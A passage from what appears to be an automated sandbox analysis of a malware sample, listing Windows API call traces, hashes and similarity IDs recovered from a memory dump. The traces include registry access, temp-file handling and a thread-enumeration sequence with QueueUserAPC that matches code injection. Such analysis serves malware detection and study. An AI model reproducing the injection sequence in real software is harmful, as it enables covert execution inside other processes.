                                                              • Part of subcall function 04BA24CF: RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BA2531
                                                              • Part of subcall function 04BA24CF: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BA2569
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                            • String ID:
                                                            • API String ID: 4198405257-0
                                                            • Opcode ID: d3cbbe41d66c567beb08c1f99484a334b58e858234e511e83a416b15a76dcc58
                                                            • Instruction ID: 96eac1d35e6a16310b6483c5687c3457d8aa54fa7058925af502f89a4e28423c
                                                            • Opcode Fuzzy Hash: d3cbbe41d66c567beb08c1f99484a334b58e858234e511e83a416b15a76dcc58
                                                            • Instruction Fuzzy Hash: 0C615D71A0020AEFCB10DFA9DCC4EAE7BB9EB08344F0545AAE905E7201D774E954DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 04BADD70
                                                            • CreateFileW.KERNEL32(04BA1DEA,80000000,00000003,04BCC1A8,00000003,00000000,00000000,?,04BA1DEA,?), ref: 04BADD8D
                                                            • GetLastError.KERNEL32(?,04BA1DEA,?), ref: 04BADE35
                                                              • Part of subcall function 04BAAB88: lstrlen.KERNEL32(00000000,00000000,00000000,00000027,00000000,?,00000000,?,69B25F44,00000000,00000000,00000000), ref: 04BAABBE
                                                              • Part of subcall function 04BAAB88: lstrcpy.KERNEL32(00000000,00000000), ref: 04BAABE2
                                                              • Part of subcall function 04BAAB88: lstrcat.KERNEL32(00000000,00000000), ref: 04BAABEA
                                                            • GetFileSize.KERNEL32(04BA1DEA,00000000,?,00000001,?,04BA1DEA,?), ref: 04BADDC0
                                                            • CreateFileMappingA.KERNEL32(04BA1DEA,04BCC1A8,00000002,00000000,00000000,04BA1DEA), ref: 04BADDD4
                                                            • lstrlen.KERNEL32(04BA1DEA,?,04BA1DEA,?), ref: 04BADDF0
                                                            • lstrcpy.KERNEL32(?,04BA1DEA), ref: 04BADE00
                                                            • GetLastError.KERNEL32(?,04BA1DEA,?), ref: 04BADE08
                                                            • HeapFree.KERNEL32(00000000,04BA1DEA,?,04BA1DEA,?), ref: 04BADE1B
                                                            • CloseHandle.KERNEL32(04BA1DEA,?,00000001,?,04BA1DEA), ref: 04BADE2D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                            • String ID:
                                                            • API String ID: 194907169-0
                                                            • Opcode ID: 57326386d6fc65d4cf6f139c2eb348fd87244d4b78f93bf1ded878b8fff7be04
                                                            • Instruction ID: c253f5ef6953601c1a3124a0ab4cc3c9e306d45544ce81d765f61f80f6a95d40
                                                            • Opcode Fuzzy Hash: 57326386d6fc65d4cf6f139c2eb348fd87244d4b78f93bf1ded878b8fff7be04
                                                            • Instruction Fuzzy Hash: 0421D771900208FFDB109FA5D8C8E9DBFB9EF18355F10846AF505E7250D7359E549B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BBAE8B
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04BBAE97
                                                            • GetModuleHandleA.KERNEL32(?,05C89732,?,00000000,00000000), ref: 04BBAEB7
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04BBAEBE
                                                            • Thread32First.KERNEL32(00000001,0000001C), ref: 04BBAECE
                                                            • OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 04BBAEE9
                                                            • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 04BBAEFA
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BBAF01
                                                            • Thread32Next.KERNEL32(00000001,0000001C), ref: 04BBAF0A
                                                            • CloseHandle.KERNEL32(00000001), ref: 04BBAF16
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                            • String ID:
                                                            • API String ID: 2341152533-0
                                                            • Opcode ID: c5de6d4fb91aebe13a07e72314e45ef94a1cc23a11179e6747a7d8b74e11131d
                                                            • Instruction ID: 50714ac238aa7bd82a321c4761c6f922ddca94252382879fd338cd33d1c20463
                                                            • Opcode Fuzzy Hash: c5de6d4fb91aebe13a07e72314e45ef94a1cc23a11179e6747a7d8b74e11131d
                                                            • Instruction Fuzzy Hash: 222159B2900108AFDF10AFA0DCC8DEE7BB9EB0C355B044566FA05E7150DB75AD559BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 04BA91EE
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 04BA92A6
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 04BA923C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BA9255
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04BA9274
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 04BA9286
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04BA928E
                                                            Strings
                                                            • Software\Microsoft\WAB\DLLPath, xrefs: 04BA91DF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                            • String ID: Software\Microsoft\WAB\DLLPath
                                                            • API String ID: 1628847533-3156921957

                                                            APIs
                                                              • Part of subcall function 04BB4211: RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BB4219
                                                              • Part of subcall function 04BB4211: RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BB422E
                                                              • Part of subcall function 04BB4211: InterlockedIncrement.KERNEL32(0000001C), ref: 04BB4247
                                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04BC2F42
                                                            • memset.NTDLL ref: 04BC2F53
                                                            • lstrcmpi.KERNEL32(?,?), ref: 04BC2F93
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC2FBF
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BC2FD3
                                                            • memset.NTDLL ref: 04BC2FE0
                                                            • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 04BC2FF9
                                                            • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 04BC301C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BC3039
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                            • String ID:
                                                            • API String ID: 694413484-0

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000008,00000008,?,?,?), ref: 04BBDFFD
                                                            • lstrlen.KERNEL32(?,?,?), ref: 04BBE005
                                                            • lstrlen.KERNEL32(00000001,?,?), ref: 04BBE070
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BBE09B
                                                            • memcpy.NTDLL(00000000,00000002,?,?,?), ref: 04BBE0AC
                                                            • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?), ref: 04BBE0C2
                                                            • memcpy.NTDLL(00000000,00000001,00000001,00000000,00000000,00000000,?,?,?,?,?), ref: 04BBE0D4
                                                            • memcpy.NTDLL(00000000,04BC63D8,00000002,00000000,00000001,00000001,00000000,00000000,00000000,?,?,?,?,?), ref: 04BBE0E7
                                                            • memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?), ref: 04BBE0FC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$lstrlen$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3386453358-0

                                                            APIs
                                                              • Part of subcall function 04BB4211: RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BB4219
                                                              • Part of subcall function 04BB4211: RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BB422E
                                                              • Part of subcall function 04BB4211: InterlockedIncrement.KERNEL32(0000001C), ref: 04BB4247
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BC0F0A
                                                            • lstrlen.KERNEL32(00000008,?,?,?,04BA3273,?,00000000,73B76900,00000000), ref: 04BC0F19
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 04BC0F2B
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,04BA3273,?,00000000,73B76900,00000000), ref: 04BC0F3B
                                                            • memcpy.NTDLL(00000000,?,?,?,?,?,04BA3273,?,00000000,73B76900,00000000), ref: 04BC0F4D
                                                            • lstrcpy.KERNEL32 ref: 04BC0F7F
                                                            • RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BC0F8B
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BC0FE3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3746371830-0

                                                            APIs
                                                              • Part of subcall function 04BB9F80: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BB9FB2
                                                              • Part of subcall function 04BB9F80: HeapFree.KERNEL32(00000000,00000000,?,?,04BA8FA2,?,00000022,?,?,?,?,?,?,?,?,?), ref: 04BB9FD7
                                                              • Part of subcall function 04BBDF48: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,04BB6098,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BBDF84
                                                              • Part of subcall function 04BBDF48: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,04BB6098,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BBDFD7
                                                            • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BB60CD
                                                            • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BB60D5
                                                            • lstrlen.KERNEL32(?), ref: 04BB60DF
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB60F4
                                                            • wsprintfA.USER32 ref: 04BB6130
                                                            • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 04BB614F
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB6164
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB6171
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04BB617F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                            • String ID:
                                                            • API String ID: 168057987-0

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,04BB428F,00000008,?,00000010,00000001,00000000,0000003A), ref: 04BAFF48
                                                            • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 04BAFF7C
                                                            • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 04BAFF84
                                                            • GetLastError.KERNEL32 ref: 04BAFF8E
                                                            • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 04BAFFAA
                                                            • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 04BAFFC3
                                                            • CancelIo.KERNEL32(?), ref: 04BAFFD8
                                                            • CloseHandle.KERNEL32(?), ref: 04BAFFE8
                                                            • GetLastError.KERNEL32 ref: 04BAFFF0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                            • String ID:
                                                            • API String ID: 4263211335-0

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BB2283,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB81DD
                                                            • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04BB81F3
                                                            • _snwprintf.NTDLL ref: 04BB8218
                                                            • CreateFileMappingW.KERNEL32(000000FF,04BCC1A8,00000004,00000000,00001000,?), ref: 04BB8234
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BB8246
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04BB825D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04BB827E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BB8286
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1814172918-0

                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 04BB70E2
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BB7105
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 04BB710D
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 04BB7158
                                                            • memcpy.NTDLL(00000000,?,00000008,00000006), ref: 04BB71C0
                                                            • LocalFree.KERNEL32(?,00000006), ref: 04BB71D7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                            • String ID: P
                                                            • API String ID: 3649579052-3110715001

                                                            APIs
                                                              • Part of subcall function 04BC1736: RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                              • Part of subcall function 04BC1736: lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04BB0E73
                                                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04BB0E8B
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0EED
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BB0F01
                                                            • WaitForSingleObject.KERNEL32(00000000,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F53
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F7C
                                                            • HeapFree.KERNEL32(00000000,04BB2333,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F8C
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F95
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                            • String ID:
                                                            • API String ID: 3503961013-0

                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,0000002C,7656D3B0,00000000,00000000,04BB5ADA), ref: 04BAF8C6
                                                            • StrChrA.SHLWAPI(00000001,0000002C), ref: 04BAF8D9
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 04BAF8FC
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04BAF90B
                                                            • lstrlen.KERNEL32(00000000), ref: 04BAF940
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04BAF953
                                                            • lstrcpy.KERNEL32(00000004,00000000), ref: 04BAF971
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 04BAF995
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1974185407-0

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BAC142
                                                            • wsprintfA.USER32 ref: 04BAC16A
                                                            • lstrlen.KERNEL32(00000008), ref: 04BAC179
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            • wsprintfA.USER32 ref: 04BAC1B9
                                                            • wsprintfA.USER32 ref: 04BAC1EE
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BAC1FB
                                                            • memcpy.NTDLL(00000008,04BC63D8,00000002,00000000,?,?), ref: 04BAC210
                                                            • wsprintfA.USER32 ref: 04BAC233
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 2937943280-0

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,04BBA2FF,?,?,?,?), ref: 04BBBDF0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BBBE02
                                                            • wcstombs.NTDLL ref: 04BBBE10
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04BBA2FF,?,?,?,?,?), ref: 04BBBE34
                                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04BBBE49
                                                            • mbstowcs.NTDLL ref: 04BBBE56
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04BBA2FF,?,?,?,?,?), ref: 04BBBE68
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,04BBA2FF,?,?,?,?,?), ref: 04BBBE82
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                            • String ID:
                                                            • API String ID: 316328430-0

                                                            APIs
                                                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 04BB69F5
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04BB6A13
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BB6A1B
                                                            • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 04BB6A39
                                                            • GetLastError.KERNEL32 ref: 04BB6A4D
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BB6A58
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BB6A5F
                                                            • GetLastError.KERNEL32 ref: 04BB6A67
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                            • String ID:
                                                            • API String ID: 3822162776-0

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9fe1e46813c4424fc94c1d1f68d03d7e66169a8997b3f9fd19be636c3d3ed8e8
                                                            • Instruction ID: b1463fc6f991e7d86e1d12c1e0f972a9ae50a0206509d6dd923636cc6ea61a94
                                                            • Opcode Fuzzy Hash: 9fe1e46813c4424fc94c1d1f68d03d7e66169a8997b3f9fd19be636c3d3ed8e8
                                                            • Instruction Fuzzy Hash: 9EA10575D04209EFEF269FA8CC44AFEBBBAFF04308F0440A9E551A2460D771AA65DF10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 04BC17DD
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 04BC17FA
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC182D
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04BC1858
                                                            • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 04BC191A
                                                              • Part of subcall function 04BBBAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04BB4A41,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000), ref: 04BBBAED
                                                              • Part of subcall function 04BBBAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BBBB10
                                                              • Part of subcall function 04BBBAE4: memset.NTDLL ref: 04BBBB1F
                                                            • lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 04BC18CB
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 04BC18FA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                            • String ID:
                                                            • API String ID: 239510280-0
                                                            • Opcode ID: 663b16b0ba1b56c2e798bcdad32c0e654d9d84a3e0a8298e73b1e56cf9e3a583
                                                            • Instruction ID: cd1ea25d45b3b59ed1aa4ec9c0dc0b19b272906a46bb783ed91ad9c0a89785eb
                                                            • Opcode Fuzzy Hash: 663b16b0ba1b56c2e798bcdad32c0e654d9d84a3e0a8298e73b1e56cf9e3a583
                                                            • Instruction Fuzzy Hash: 0641D935604205FBEB125B68DCC4FAE7BB8EF58705F1000AAF605B7181EBB5AD41DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL ref: 04BB5148
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BB518B
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BB51A6
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 04BB51FC
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 04BB5257
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 04BB5265
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BB5270
                                                              • Part of subcall function 04BAC547: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04BAC55B
                                                              • Part of subcall function 04BAC547: memcpy.NTDLL(00000000,04BAF989,?,?,-00000005,?,04BAF989,00000001,00000000,-00000005,00000001), ref: 04BAC584
                                                              • Part of subcall function 04BAC547: RegCloseKey.ADVAPI32(?,?,04BAF989,00000001,00000000,-00000005,00000001), ref: 04BAC5D8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                                                            • String ID:
                                                            • API String ID: 2070110485-0
                                                            • Opcode ID: 17d31913981541376169d0ea3640b13f21433654f5c941a205e3b6f24e5f6cb5
                                                            • Instruction ID: e3f24a4bcbcc26b56a0ce04e2eb853c44d233a0c849e5417508cf1b31be05f05
                                                            • Opcode Fuzzy Hash: 17d31913981541376169d0ea3640b13f21433654f5c941a205e3b6f24e5f6cb5
                                                            • Instruction Fuzzy Hash: C7418D72600205BBEF318F65DCC5FBA3BA8EB48349F080065F945DB140DBB5ED51DAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04BB1887
                                                            • StrTrimA.SHLWAPI(?,?), ref: 04BB18A5
                                                            • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 04BB190E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 04BB192F
                                                            • DeleteFileA.KERNEL32(?,00003219), ref: 04BB1951
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB1960
                                                            • HeapFree.KERNEL32(00000000,?,00003219), ref: 04BB1978
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 1078934163-0
                                                            • Opcode ID: 8445be87755b77ebb49548abdecbaa52cdec2611d58b6fcb6015fc7fff8ab556
                                                            • Instruction ID: a1df7c9ae364920483ad0b56720104f7c63dddcf02e426a4d34b02c9336667a6
                                                            • Opcode Fuzzy Hash: 8445be87755b77ebb49548abdecbaa52cdec2611d58b6fcb6015fc7fff8ab556
                                                            • Instruction Fuzzy Hash: 6A31B132604205AFE311AB58DC84FAA77ECEB59784F094455F684E7190D7A8FD068BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,04BA2DC7), ref: 04BBDE3C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 04BBDE51
                                                            • memset.NTDLL ref: 04BBDE5E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001A,?,?,04BA2DC6,?,?), ref: 04BBDE7B
                                                            • memcpy.NTDLL(?,?,04BA2DC6,?,0000001A,?,?,04BA2DC6,?,?), ref: 04BBDE9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocate$Freememcpymemset
                                                            • String ID: chun
                                                            • API String ID: 2362494589-3058818181
                                                            • Opcode ID: fdaf6050891c6a15a4034de7486c26a1cc988c28e7ccad4d497697467bb44a0a
                                                            • Instruction ID: 7171271fdd1414af36bcaa50e1e8876b7284d043ec9e4706e9987fd332f5393c
                                                            • Opcode Fuzzy Hash: fdaf6050891c6a15a4034de7486c26a1cc988c28e7ccad4d497697467bb44a0a
                                                            • Instruction Fuzzy Hash: 5E319E71504706AFD7209F55D880AA7BBEDEF18314F05486AE989C7220D7B4FD05CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
